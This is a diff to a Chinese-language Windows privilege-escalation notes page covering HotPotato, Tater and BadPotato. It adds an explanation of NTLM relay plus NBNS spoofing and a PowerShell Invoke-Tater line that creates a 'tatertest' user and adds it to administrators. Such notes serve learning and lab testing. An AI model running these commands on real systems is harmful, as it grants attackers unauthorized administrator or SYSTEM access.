--- a/docs/网络安全/端点安全/Windows/提权/土豆提权.md
+++ b/docs/网络安全/端点安全/Windows/提权/土豆提权.md
@@ -6,6 +6,10 @@
     - [影响范围](#影响范围)
     - [原理](#原理)
     - [利用过程](#利用过程)
+  - [Tater](#tater)
+    - [利用过程](#利用过程-1)
+      - [Windows 7 使用 trigger 1 （NBNS WPAD Bruteforce + Windows Defender Signature Updates）](#windows-7-使用-trigger-1-nbns-wpad-bruteforce--windows-defender-signature-updates)
+      - [Windows 10 using trigger 2 (WebClient Service + Scheduled Task)](#windows-10-using-trigger-2-webclient-service--scheduled-task)
   - [BadPotato](#badpotato)
     - [使用方法](#使用方法)
 
@@ -84,7 +88,9 @@ Windows 7、8、10、Server 2008 和 Server 2012
 
 ### 原理
 
+HotPotato 利用 Windows 中的NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗在默认配置中获得本地权限提升
 
+攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至`NT AUTHORITY\SYSTEM`
 
 ---
 
@@ -170,23 +176,21 @@ net localgroup administrators
 
 #### Windows 10 using trigger 2 (WebClient Service + Scheduled Task)
 
+> [New Windows10 Trigger #2 / github.com/Kevin-Robertson/Tater/issue](https://github.com/Kevin-Robertson/Tater/issues/2)
+
 ```powershell
 net localgroup administrators
 . .\Tater.ps1
 ## 如果上一步执行报错则执行此命令，否则跳过
 Set-ExecutionPolicy Unrestricted -Scope CurrentUser
 
-Invoke-Tater -Command "net localgroup administrators tatertest /add" -trigger 2
+Invoke-Tater -Command "net user tatertest testpass /add && net localgroup administrators tatertest /add" -trigger 2
 net localgroup administrators
 ```
 
+![0e8fb956703b224d8497fc539c7d5ff0](http://cdn.ayusummer233.top/DailyNotes/202412171128371.png)
 
-
-
-
-
-
-
+> TODO: 可能是系统版本太高了没成功， 这里需要一个成功的图
 
 ---
 
